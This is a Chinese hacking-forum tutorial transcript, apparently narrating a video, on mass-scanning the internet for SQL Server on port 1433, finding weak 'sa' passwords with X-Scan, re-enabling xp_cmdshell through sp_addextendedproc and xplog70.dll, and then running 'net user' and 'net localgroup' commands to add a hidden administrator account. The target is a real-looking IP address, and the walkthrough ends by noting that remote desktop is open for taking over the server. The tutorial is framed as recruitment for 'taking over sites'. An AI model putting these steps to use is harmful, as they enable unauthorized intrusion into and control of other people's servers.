新世纪网安动画投稿方式:
投稿方法一:
FTP://www.520hack.com
账号:520hack  密码:520hack
投稿方法二:
邮箱:  www520hack@126.com
投稿收录奖励情况详见:http://bbs.520hack.com/read.php?tid=81824
制作原创教程,可免费得论坛邀请码.
举报教程错误,病毒捆马,欺骗性,骗钱,卖软件类(本站将无条件删除)
举报地址:http://bbs.520hack.com/thread.php?fid=105
--------------------------------------------------------------

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
【蓝血技术联盟】:
欢迎大家加入蓝血技术联盟 学习拿站的好地方！
我是蓝血小超                               本人联系QQ：381472493    蓝血家族正在火热招人  5群： 35340538                                               家族网盘地址：http://mcgc.sgsg.cn             10群： 27962489
论坛:lanxue.8bbs.cn    IS：10829537           
·····················································

      这里小打下广告....   今天要做的教程是  1433扫描加扫弱口令..和恢复弱口令..恢复可执行

      好了..教程开始了   用到的工具有：S扫描器   （再加个：IP整理器）
 
                                       SQLTools

                                       X-Scan

                                       SQL查询分析器（这是最重要的.恢复要用到）

      工具能打包的下的我会打包...先进行扫1433端口吧..提示..由于XP的线程太少..要打补丁..我会提供给大家..把他改成4000-5000..好了..开始扫1433端口吧.就用纯真IP数据库..这个大家都有吧..开始之前先点下突破SP2..再点TCP扫描..扫的过程中我会暂停..先暂停下啦..扫完了..刚刚按错了..不小心按到F2了..郁闷..再来..先整理下IP..整理好了..这个工具我会打包的..现在开始用（X-Scan）...嘿嘿..这个扫出他的弱口令的..这个工具太大..打包不下..如果要的话..上面有联系的..把整理好的IP放进去..开始扫啦..扫的过程中我会暂停..查看弱口令就是在漏洞信息里察看..让他扫吧..我先暂停下...好了..扫出几个了..[58.60.125.73]: 发现SQL-Server弱口令 "sa/[空口令]  我们先试试这个..这个也会打包..嘿嘿..提倡一切共享，下面就要用到下面那些指令喽..不好意思..刚刚接了个电话..郁闷..太卡了..

C:\>DIR C:\
未能找到存储过程 'master..xp_cmdshell'。这个是代表没用的..我们来恢复成有用...我先停了这个..放在这扫卡..

net user dabao 5014582 /add  （在DOS里创建账户）

net localgroup administrator dabao /add  （给你创建的账户提权..提为计算机管理员）

netstat -an   （察看端口）

systeminfo    （察看系统）

create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call

*/
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO

EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int（这个也要用到哦）

刚刚电脑出了点问题..不好意思啊..我们继续..卡哦..我电脑太垃圾了..郁闷..我郁闷..难道软件出了问题了？？终于出来..只要把这段代码复制进去..再按F5就行了（命令已成功完成。）   再来下一段代码（命令已成功完成。）了..嘿嘿..现在可以执行了...C:\>DIR C:\
  驱动器 C 中的卷没有标签。
  卷的序列号是 D4B2-7BA7
 
  C:\ 的目录
 
 2008-06-26  16:35            19,615 3389.exe
 2008-06-18  14:30                 0 AUTOEXEC.BAT
 2008-06-18  14:30                 0 CONFIG.SYS
 2008-06-20  17:47                25 csb.log
 2008-07-05  09:37           202,924 diy3389.exe
 2008-06-18  14:34    <DIR>          Documents and Settings
 2008-06-23  14:37    <DIR>          Program Files
 2008-07-18  11:18    <DIR>          RavBin
 2008-07-16  09:07            65,536 UFInit.MDB
 2008-07-16  10:29    <DIR>          WINDOWS
 2008-06-18  14:31    <DIR>          wmpub
                6 个文件        288,100 字节
                5 个目录 24,151,080,960 可用字节
 
看..有用了吧....今天电脑有点卡..我就不多做了...1433端口可以拿服务器..
真幸运..3389开的...Server 2003..我就不多做了..后面的大家都知道了吧..